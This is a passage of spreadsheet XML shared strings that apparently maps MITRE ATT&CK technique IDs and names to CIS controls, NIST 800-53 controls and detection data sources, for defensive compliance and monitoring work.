    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,SC-23,SC-4,SC-7,SC-8,SI-10,SI-12,SI-15,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>3.11,3.12,3.3,6.1,6.2,6.8,8.9,11.1,11.2,11.3,11.4,11.5,12.8</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-3,CA-7,CM-2,CM-6,CM-8,CP-10,CP-6,CP-7,CP-9,SC-28,SC-36,SC-4,SC-7,SI-12,SI-16,SI-23,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1552.001</t>
  </si>
  <si>
    <t>Credentials In Files</t>
  </si>
  <si>
    <t>3.1,3.2,3.3,5.4,6.1,6.2,6.8,14.3,14.4,14.9,16.1,16.9,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-6,IA-2,IA-5,RA-5,SA-11,SA-15,SC-12,SC-28,SC-4,SC-7,SI-4</t>
  </si>
  <si>
    <t>File: File Creation, File: File Metadata</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>VNC</t>
  </si>
  <si>
    <t>2.1,2.2,2.3,2.4,2.5,4.2,4.4,4.5,4.8,7.6,7.7,13.4,18.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-4,AC-6,CA-7,CA-8,CM-11,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,IA-6,RA-5,SC-7,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1552.004</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>3.1,3.11,3.12,3.2,3.3,5.2,5.4,6.1,6.2,6.8,11.3,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-20,CA-7,CA-8,CM-2,CM-6,IA-2,IA-5,RA-5,SA-11,SA-15,SC-12,SC-28,SC-4,SC-7,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t>3.1,3.11,3.12,3.3,3.4,4.1,5.4,6.1,6.2,6.8,8.1,8.2,8.3,12.8,3.10,8.10</t>
  </si>
  <si>
    <t>T1601</t>
  </si>
  <si>
    <t>Modify System Image</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-8,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-2,IA-5,IA-7,RA-9,SA-10,SA-11,SC-34,SI-2,SI-4,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>Internet Scan: Response Content</t>
  </si>
  <si>
    <t>T1601.001</t>
  </si>
  <si>
    <t>Patch System Image</t>
  </si>
  <si>
    <t>3.6,4.1,4.7,5.2,5.3,5.4,6.1,6.2,6.4,6.5,6.8,12.2</t>
  </si>
  <si>
    <t>T1601.002</t>
  </si>
  <si>
    <t>Downgrade System Image</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>Windows Service</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-11,CM-2,CM-5,IA-2</t>
  </si>
  <si>
    <t>T1136.003</t>
  </si>
  <si>
    <t>Cloud Account</t>
  </si>
  <si>
    <t>3.12,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5,11.3,11.4,12.2,12.8,16.8</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>AC-2,AC-4,AC-6,CA-7,CA-8,CM-2,CM-6,CM-8,RA-10,RA-5,SC-18,SC-2,SC-26,SC-29,SC-3,SC-30,SC-35,SC-39,SC-7,SI-2,SI-3,SI-4,SI-5,SI-7</t>
  </si>
  <si>
    <t>T1003.005</t>
  </si>
  <si>
    <t>Cached Domain Credentials</t>
  </si>
  <si>
    <t>4.1, 4.7, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 14.1, 14.3, 16.1, 16.9, 18.3, 18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,IA-4,IA-5,SC-28,SC-39,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>4.2,4.9,9.2,9.3,13.3,13.4,13.8,13.10</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-10,SC-20,SC-21,SC-22,SC-23,SC-31,SC-37,SC-7,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1556</t>
  </si>
  <si>
    <t>Modify Authentication Process</t>
  </si>
  <si>
    <t>2.6,4.1,4.7,5.1,5.3,5.4,5.5,6.1,6.2,6.4,6.5,6.8,12.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,IA-5,SC-39,SI-4,SI-7</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>3.3,4.2,4.4,4.7,5.3,6.1,6.2,6.8,13.4</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,CA-7,CM-5,CM-6,CM-7,IA-2,IA-3,IA-4,IA-8,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>2.3,2.5,3.3,4.1,4.7,5.3,5.4,14.1,14.2,14.3,14.6,18.3,18.5</t>
  </si>
  <si>
    <t>AC-10,AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-5,CM-6,IA-2,IA-4,IA-5,IA-8,RA-5,SA-11,SA-15,SI-4</t>
  </si>
  <si>
    <t>Drive: Drive Modification</t>
  </si>
  <si>
    <t>T1557.001</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.5,4.8,7.6,7.7,12.2,12.8,13.3,13.8,16.8,18.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,SC-23,SC-46,SC-7,SC-8,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>Local Accounts</t>
  </si>
  <si>
    <t>4.1,4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-5,CM-6,IA-12,IA-2,SA-10,SA-11,SA-15,SA-16,SA-17,SA-3,SA-4,SA-8,SC-28,SI-4</t>
  </si>
  <si>
    <t>T1547.006</t>
  </si>
  <si>
    <t>Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8,10.1,10.2,10.7,13.2,13.7</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,CM-6,CM-7,IA-2,IA-4,IA-8,RA-5,SI-10,SI-14,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1505.002</t>
  </si>
  <si>
    <t>Transport Agent</t>
  </si>
  <si>
    <t>Instance: Instance Creation</t>
  </si>
  <si>
    <t>T1204.002</t>
  </si>
  <si>
    <t>Malicious File</t>
  </si>
  <si>
    <t>2.5,2.7,14.1,14.2,14.6</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-44,SC-7,SI-10,SI-3,SI-4,SI-7,SI-8</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>T1021.003</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.4,4.5,4.8,7.7,12.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-4,AC-5,AC-6,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SC-18,SC-3,SC-46,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1059.007</t>
  </si>
  <si>
    <t>JavaScript/JScript</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.8,9.3,9.6,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CA-7,CM-2,CM-6,CM-7,CM-8,RA-5,SC-18,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1136.002</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.4,6.5,11.3,11.4,12.2,12.8,18.3,18.5</t>
  </si>
  <si>
    <t>File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>Network Address Translation Traversal</t>
  </si>
  <si>
    <t>4.1,4.2,4.4,4.7,5.2,5.3,5.4,6.1,6.2,6.4,6.5,6.8,12.2,13.4</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,IA-5,SC-28,SC-7,SI-10,SI-15,SI-4,SI-7</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Web Credential: Web Credential Creation, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1098.001</t>
  </si>
  <si>
    <t>Additional Cloud Credentials</t>
  </si>
  <si>
    <t>3.12,3.3,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5,11.3,11.4,12.2,12.8,16.8</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>T1558.003</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,5.4,5.5,6.8,3.10</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification, Command: Command Execution, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Process: Process Creation, Process: Process Termination, Script: Script Execution, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1574.002</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>4.1,6.1,6.2,6.8,7.1,7.2,7.3,7.4,7.5,16.13,18.3,18.5</t>
  </si>
  <si>
    <t>SA-10,SA-11,SA-15,SA-16,SA-17,SA-3,SA-4,SA-8,SI-2</t>
  </si>
  <si>
    <t>T1059.006</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>2.1,2.2,2.3,2.4,2.5,2.7,4.1,9.7,10.1,10.2,10.7,13.2,13.7,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-11,CM-2,CM-3,CM-5,CM-6,SI-10,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>3.3,4.1,4.2,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-10,CM-2,CM-5,CM-6,CM-7,IA-2,IA-9,SC-23,SC-8,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1552.002</t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t>3.1,3.2,3.3,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-5,CM-6,IA-2,IA-5,RA-5,SA-11,SA-15,SC-12,SC-28,SC-4,SI-4</t>
  </si>
  <si>
    <t>T1003.004</t>
  </si>
  <si>
    <t>LSA Secrets</t>
  </si>
  <si>
    <t>4.7, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 14.1, 14.3, 16.1, 16.9</t>
  </si>
  <si>
    <t>Command: Command Execution, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>Web Protocols</t>
  </si>
  <si>
    <t>T1563.001</t>
  </si>
  <si>
    <t>SSH Hijacking</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.7,4.8,5.2,5.3,6.1,6.2,6.8,7.7,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-5,RA-5,SC-12,SC-23,SI-4</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1542.001</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-3,CM-5,CM-6,CM-8,IA-2,IA-7,IA-8,RA-9,SA-10,SA-11,SC-34,SI-2,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.7,4.8,5.3,6.1,6.2,6.4,6.5,6.8,7.6,16.10,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CM-2,CM-5,CM-6,CM-8,IA-2,IA-5,RA-5,SI-4</t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>Verclsid</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.2,4.4,4.5,4.8,7.6,7.7,13.4,18.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-11,CM-2,CM-6,CM-7,CM-8,RA-5,SC-7,SI-10,SI-15,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Deletion, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,IA-2,IA-4,IA-5,SC-28,SC-39,SI-3,SI-4</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,6.3,6.4,6.5,4.10</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>At (Windows)</t>
  </si>
  <si>
    <t>Container: Container Creation, File: File Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1218.005</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.8,18.3,18.5</t>
  </si>
  <si>
    <t>CM-11,CM-2,CM-6,CM-7,CM-8,RA-5,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1218.011</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>CA-7,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.8,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-3,CM-5,CM-6,CM-8,IA-2,IA-7,RA-9,SA-10,SA-11,SI-2,SI-7</t>
  </si>
  <si>
    <t>T1558.002</t>
  </si>
  <si>
    <t>Silver Ticket</t>
  </si>
  <si>
    <t>T1078.002</t>
  </si>
  <si>
    <t>Domain Accounts</t>
  </si>
  <si>
    <t>4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.4,6.5,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CM-5,CM-6,IA-12,IA-2,IA-5,SI-4</t>
  </si>
  <si>
    <t>T1546.003</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,IA-2,SI-14,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1542.003</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>3.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>T1543.002</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>2.3,2.5,3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-11,CM-2,CM-3,CM-5,CM-6,IA-2,SA-22,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1574.007</t>
  </si>
  <si>
    <t>Path Interception by PATH Environment Variable</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,6.1,6.2,6.8,16.13,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-6,CM-7,CM-8,RA-5,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Domain Name: Active DNS, Domain Name: Domain Registration, Domain Name: Passive DNS, Internet Scan: Response Content, Internet Scan: Response Metadata</t>
  </si>
  <si>
    <t>T1574.009</t>
  </si>
  <si>
    <t>Path Interception by Unquoted Path</t>
  </si>
  <si>
    <t>T1558.004</t>
  </si>
  <si>
    <t>AS-REP Roasting</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,18.3,18.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-3,CA-7,CA-8,CM-2,CM-6,IA-2,IA-5,RA-5,SA-11,SA-15,SC-4,SI-12,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>Disable or Modify System Firewall</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1574.008</t>
  </si>
  <si>
    <t>Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t>Domain Name: Active DNS, Domain Name: Domain Registration, Domain Name: Passive DNS</t>
  </si>
  <si>
    <t>T1556.001</t>
  </si>
  <si>
    <t>Domain Controller Authentication</t>
  </si>
  <si>
    <t>2.6,4.1,4.7,5.1,5.3,5.4,5.5,6.1,6.2,6.4,6.5,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CA-7,CM-5,CM-6,IA-2,IA-5,SC-39,SI-4,SI-7</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1053.003</t>
  </si>
  <si>
    <t>Cron</t>
  </si>
  <si>
    <t>4.7,5.3,5.4,6.1,6.2,6.8,8.1,8.11,8.2,8.5,8.9,18.3,18.5,8.10</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-5,IA-2,RA-5,SI-4</t>
  </si>
  <si>
    <t>File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Modification</t>
  </si>
  <si>
    <t>T1550.001</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</t>
  </si>
  <si>
    <t>Application Access Token</t>
  </si>
  <si>
    <t>2.3,2.5,3.11,4.1,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-19,AC-20,CA-8,CM-10,CM-11,CM-2,CM-6,IA-2,IA-4,SC-28,SC-8,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,10.3,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-20,AC-23,AC-3,AC-6,CA-7,CM-2,CM-6,CM-7,CM-8,MP-7,RA-5,SA-8,SC-28,SC-41,SI-3,SI-4,SR-4</t>
  </si>
  <si>
    <t>T1052.001</t>
  </si>
  <si>
    <t>Exfiltration over USB</t>
  </si>
  <si>
    <t>T1059.008</t>
  </si>
  <si>
    <t>Network Device CLI</t>
  </si>
  <si>
    <t>2.7,4.1,4.7,5.3,5.4,6.1,6.2,6.8,12.2,12.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-2,CM-5,CM-6,IA-2,IA-8,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Group: Group Enumeration, Group: Group Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>2.3,2.7,4.1,4.8,13.3,13.8,14.1,14.2,14.6,18.3,18.5</t>
  </si>
  <si>
    <t>CA-7,CM-2,CM-6,CM-7,CM-8,RA-5,SC-44,SC-7,SI-10,SI-2,SI-3,SI-4,SI-7,SI-8</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1542.004</t>
  </si>
  <si>
    <t>ROMMONkit</t>
  </si>
  <si>
    <t>4.1,13.3,13.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-6,CA-7,CA-8,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-7,RA-5,RA-9,SA-10,SA-11,SC-34,SC-7,SI-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1550.002</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,5.4,6.1,6.2,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,CM-6,IA-2,SI-2</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>Domain Policy Modification</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,5.5,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,CM-7,IA-2,RA-5,SI-4</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>Local Account</t>
  </si>
  <si>
    <t>4.7,5.3,5.4,6.1,6.2,6.4,6.5</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,CM-5,CM-6,IA-2,IA-5,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1053.001</t>
  </si>
  <si>
    <t>At (Linux)</t>
  </si>
  <si>
    <t>4.7,5.3,5.4,6.1,6.2,6.8,8.1,8.11,8.2,8.3,8.5,8.9,18.3,18.5,8.10</t>
  </si>
  <si>
    <t>T1036.005</t>
  </si>
  <si>
    <t>Match Legitimate Name or Location</t>
  </si>
  <si>
    <t>T1195.002</t>
  </si>
  <si>
    <t>Compromise Software Supply Chain</t>
  </si>
  <si>
    <t>T1574.010</t>
  </si>
  <si>
    <t>Services File Permissions Weakness</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.8,16.13,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,IA-2,RA-5,SI-4</t>
  </si>
  <si>
    <t>Internet Scan: Response Content, Internet Scan: Response Metadata</t>
  </si>
  <si>
    <t>T1556.004</t>
  </si>
  <si>
    <t>Network Device Authentication</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,5.4,6.1,6.2,6.4,6.5,6.8,12.2</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CM-2,CM-5,CM-6,IA-2,IA-5,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1547.011</t>
  </si>
  <si>
    <t>Plist Modification</t>
  </si>
  <si>
    <t>3.3,4.1,5.4,6.1,6.2,6.8,14.3,14.4</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-3,AC-6,CA-7,CM-2,CM-3,CM-5,CM-6,CM-7,SA-10,SA-11,SA-8,SI-4,SI-7</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1565.003</t>
  </si>
  <si>
    <t>Runtime Data Manipulation</t>
  </si>
  <si>
    <t>3.12,3.3,4.4,5.4,6.1,6.2,6.8,11.3,11.4,12.2,12.8,16.8</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-6,CM-7,CP-9,SC-28,SC-4,SC-46,SC-7,SI-16,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1195.001</t>
  </si>
  <si>
    <t>Compromise Software Dependencies and Development Tools</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Container: Container Creation, Container: Container Start, Image: Image Creation, Instance: Instance Creation, Instance: Instance Start</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>Windows Command Shell</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-2,CM-6,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>CA-8,CM-11,CM-2,CM-6,CM-8,RA-5,SA-10,SA-11,SI-14,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1548.003</t>
  </si>
  <si>
    <t>Sudo and Sudo Caching</t>
  </si>
  <si>
    <t>3.3,4.1,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
